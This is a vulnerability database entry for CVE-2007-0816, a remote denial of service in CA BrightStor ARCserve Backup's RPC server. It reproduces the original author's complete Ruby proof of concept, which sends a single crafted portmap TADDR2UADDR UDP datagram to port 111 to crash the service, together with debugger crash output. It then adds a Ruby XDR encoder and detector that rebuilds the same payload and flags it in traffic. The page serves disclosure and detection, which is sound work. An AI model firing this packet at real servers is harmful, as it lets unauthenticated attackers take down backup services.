CA BrightStor ARCserve Backup catirpc.exe Remote Denial of Service Vulnerability

Vulnerability ID: 1112146
Vulnerability type: Other
Published: 2007-02-01
Updated: 2007-07-05
CVE ID: CVE-2007-0816
CNNVD ID: CNNVD-200702-107
Platform: Windows
CVSS score: 5.0
|Source
https://www.exploit-db.com/exploits/3248
https://www.securityfocus.com/bid/22365
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200702-107
|Details
BrightStor ARCserve Backup provides backup and recovery protection for servers on a range of platforms. Its CA Remote Procedure Call Server process, CATIRPC.EXE, mishandles malformed client requests: when it processes a portmap/rpcbind version 3 TADDR2UADDR (procedure 8) call it dereferences a null pointer. A remote, unauthenticated attacker (the call carries AUTH_NULL credentials) can trigger this by sending a single crafted UDP datagram to port 111, crashing the service. The published PoC author reports only a crash, not code execution, which is consistent with the CVSS 5.0 rating. The PoC below reproduces the fault with an RPC call whose TADDR2UADDR argument is one non-zero word followed by zeros; the attached WinDbg output places the crash inside CATIRPC.dll at get_hostbyname+478, where mov ax,[esi+2] reads through esi=0. Fixes are published in the CA security notices referenced at the end of this page.
|Exploit (PoC)
#!/usr/bin/ruby
#  
# Computer Associates (CA) Brightstor Backup Remote Procedure Call Server DoS (catirpc.dll)
#
# Catirpc.exe - Provides the endpoint mapper and enables RPC services for BrightStor Backup products.
# 
# (7c.350): Access violation - code c0000005 (!!! second chance !!!)
# eax=007ef924 ebx=2e009560 ecx=00325ad8 edx=007ef900 esi=00000000 edi=00324308
# eip=2e00eda8 esp=007ef8b8 ebp=2e00be00 iopl=0         nv up ei pl nz na po nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00000206
# *** WARNING: Unable to verify checksum for C:\Program Files\CA\BrightStor ARCserve 
# Backup\CATIRPC.dll
# *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program 
# Files\CA\BrightStor ARCserve Backup\CATIRPC.dll - 
# CATIRPC_2e000000!get_hostbyname+478:
# 2e00eda8 668b4602         mov     ax,[esi+0x2]          ds:0023:00000002=???? 
#
# CATIRPC.dll does not properly handle TADDR2UADDR procedures used in RPC communications with
# the CA RPC Server (Catirpc.exe). This leads to a condition where a null memory pointer
# is dereferenced. This appears to be only a DoS, but please prove me otherwise. This was tested on
# BrightStor ARCserve Backup 11.5.2.0 (SP2)
#
# (c) Copyright 2007 Shirkdog i 
#
# Author: M. Shirk (Shirkdog) shirkdog_list ^ at % hotmail.com
# Thanks to Tebodell for testing
#
# Greetz to str0ke, Galileo. Metasploit module to follow

require 'socket'

backup_server = (ARGV[0])
target_port = (ARGV[1] || 111) 

#RPC/Portmap packet
packet_of_death= 
"\xde\xad\xbe\xef"  + # XID
"\x00\x00\x00\x00" + # Message Type: Call (0)
"\x00\x00\x00\x02" + # RPC Version: 2
"\x00\x01\x86\xa0" + # Program: Portmap
"\x00\x00\x00\x03" + # Program Version: 3
"\x00\x00\x00\x08" + # Procedure: TADDR2UADDR (8)
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" + #Credentials and Verifier all NULL
"\x46\x9b\x22\xe2" + # Portmap data
"\x00\x00\x00\x00" + # Nulls that get processed during address shifting
"\x00\x00\x00\x00" +
"\x00\x00\x00\x00" 

puts "[+]Computer Associates (CA) Brightstor ARCServe Backup Remote Procedure Call Server DoS (catirpc.dll)\n"
puts "[+]Author: Shirkdog\n\n"

if (!(backup_server && target_port))
	puts "Usage: catirpcdos.rb host port (default port: 111)\n"
	exit
else
	puts "[+]Sending UDP Packet of Death...\n"	
	sock = UDPSocket.open
	sock.connect(backup_server, target_port.to_i)
	sock.send(packet_of_death, 0)
	puts "[+]Done...\n[+]Catirpc.exe is dead\n[+]... or it will die in a few seconds for you impatient bastards\n"
end

# milw0rm.com [2007-02-01]
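The PoC hand-assembles the ONC RPC message as a byte string, which hides the structure a defender needs in order to recognise the trigger on the wire. The following Ruby is an added example, not part of the original advisory or of Shirkdog's PoC: it encodes the same RPC v2 call (RFC 5531 header, AUTH_NULL credentials and verifier) with a small XDR encoder, then decodes arbitrary UDP payloads and flags TADDR2UADDR calls that look like the crash trigger. Assumptions, which are ours and not stated on this page: rpcbind version 3 procedure 8 takes a netbuf { unsigned int maxlen; opaque buf<>; } as defined in RFC 1833; the 1024-byte maxlen threshold is a constructed heuristic; all function and constant names are invented here; and the two sample payloads are constructed inline (the first reproduces the PoC's byte layout, the second is a well-formed call with a 16-byte sockaddr-style address).

```ruby
# Added example (not the advisory's or the PoC author's code): XDR/ONC RPC
# encoder and decoder for the portmap v3 TADDR2UADDR call, plus a detection
# check for the malformed argument shape the published PoC sends.
# Assumption: TADDR2UADDR's argument is netbuf { u32 maxlen; opaque buf<>; } (RFC 1833).

PORTMAP_PROG        = 100_000
RPCBVERS3           = 3
PROC_TADDR2UADDR    = 8
AUTH_NULL           = 0
MAX_PLAUSIBLE_TADDR = 1024   # assumption: no real transport address is this large

def xdr_u32(n)
  [n].pack('N')
end

# Variable-length opaque: 4-byte length, the bytes, zero padding to a 4-byte boundary.
def xdr_opaque(bytes)
  bytes = bytes.b
  pad = (4 - bytes.bytesize % 4) % 4
  xdr_u32(bytes.bytesize) + bytes + ("\x00".b * pad)
end

def xdr_netbuf(maxlen, buf)
  xdr_u32(maxlen) + xdr_opaque(buf)
end

# RPC v2 CALL message with AUTH_NULL cred and verf, followed by the procedure arguments.
def rpc_call(xid:, prog:, vers:, proc:, args:)
  xdr_u32(xid) + xdr_u32(0) + xdr_u32(2) +          # xid, CALL, RPC version 2
    xdr_u32(prog) + xdr_u32(vers) + xdr_u32(proc) +
    xdr_u32(AUTH_NULL) + xdr_opaque('') +           # credentials
    xdr_u32(AUTH_NULL) + xdr_opaque('') +           # verifier
    args
end

class XdrReader
  class Truncated < StandardError; end

  def initialize(data)
    @d = data.b
    @pos = 0
  end

  def u32
    raise Truncated, "need 4 bytes at offset #{@pos}" if @pos + 4 > @d.bytesize
    v = @d.byteslice(@pos, 4).unpack1('N')
    @pos += 4
    v
  end

  def opaque
    len = u32
    pad = (4 - len % 4) % 4
    raise Truncated, "opaque of #{len} bytes at offset #{@pos}" if @pos + len + pad > @d.bytesize
    v = @d.byteslice(@pos, len)
    @pos += len + pad
    v
  end

  def remaining
    @d.bytesize - @pos
  end
end

# Decode the call header; the returned reader is positioned at the procedure arguments.
def parse_rpc_call(payload)
  r = XdrReader.new(payload)
  h = { xid: r.u32, msg_type: r.u32, rpc_vers: r.u32,
        prog: r.u32, vers: r.u32, proc: r.u32 }
  h[:cred_flavor] = r.u32
  r.opaque                       # credential body, ignored
  h[:verf_flavor] = r.u32
  r.opaque                       # verifier body, ignored
  h[:args] = r
  h
end

# nil for traffic that is not a portmap v3 TADDR2UADDR call; otherwise an array of
# reasons the call looks like the crash trigger ([] means well-formed).
def taddr2uaddr_alert(payload)
  h = parse_rpc_call(payload)
  return nil unless h[:msg_type] == 0 && h[:rpc_vers] == 2 &&
                    h[:prog] == PORTMAP_PROG && h[:vers] == RPCBVERS3 &&
                    h[:proc] == PROC_TADDR2UADDR
  r = h[:args]
  maxlen = r.u32
  buf = r.opaque
  reasons = []
  reasons << 'empty transport address (zero-length netbuf.buf)' if buf.empty?
  reasons << "implausible netbuf.maxlen 0x#{maxlen.to_s(16)}" if maxlen > MAX_PLAUSIBLE_TADDR
  reasons << "#{r.remaining} trailing bytes after the argument" if r.remaining > 0
  reasons
rescue XdrReader::Truncated => e
  ["truncated RPC message: #{e.message}"]
end

# Constructed samples: the PoC's byte layout (XID 0xdeadbeef, maxlen 0x469b22e2,
# empty buffer, eight stray zero bytes) and a well-formed call for 127.0.0.1:111.
POC_PAYLOAD = rpc_call(xid: 0xdeadbeef, prog: PORTMAP_PROG, vers: RPCBVERS3,
                       proc: PROC_TADDR2UADDR,
                       args: xdr_netbuf(0x469b22e2, '') + ("\x00".b * 8))
BENIGN_TADDR = [2, 111, 127, 0, 0, 1].pack('vnC4') + ("\x00".b * 8)
BENIGN_PAYLOAD = rpc_call(xid: 1, prog: PORTMAP_PROG, vers: RPCBVERS3,
                          proc: PROC_TADDR2UADDR,
                          args: xdr_netbuf(BENIGN_TADDR.bytesize, BENIGN_TADDR))

if __FILE__ == $0
  { 'poc' => POC_PAYLOAD, 'benign' => BENIGN_PAYLOAD }.each do |name, p|
    puts "#{name}: #{taddr2uaddr_alert(p).inspect}"
  end
end
```

POC_PAYLOAD is byte-for-byte the 56-byte datagram the PoC above sends, so the check can be pointed at UDP/111 captures to confirm a sensor sees the trigger; a result of [] is a well-formed TADDR2UADDR, nil is unrelated RPC traffic, and anything else is worth an alert.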
|Affected products
Computer Associates Server Protection Suite r2
Computer Associates Protection Suites r2 0
Computer Associates Business Protection Suite for Microsoft SBS Std Ed r2
Computer Associates Business Protection
|References

XF: ca-brightstor-catirpc-dos (32137) http://xforce.iss.net/xforce/xfdb/32137
www3.ca.com: http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=35058
www3.ca.com: http://www3.ca.com/securityadvisor/newsinfo/collateral.aspx?cid=101317
BID: 22365 http://www.securityfocus.com/bid/22365
VUPEN: ADV-2007-0461 http://www.frsirt.com/english/advisories/2007/0461
supportconnectw.ca.com: http://supportconnectw.ca.com/public/storage/infodocs/babtapeng-securitynotice.asp
SECUNIA: 24512 http://secunia.com/advisories/24512
SECUNIA: 24009 http://secunia.com/advisories/24009
OSVDB: 32989 http://osvdb.org/32989
MILW0RM: 3248 http://milw0rm.com/exploits/3248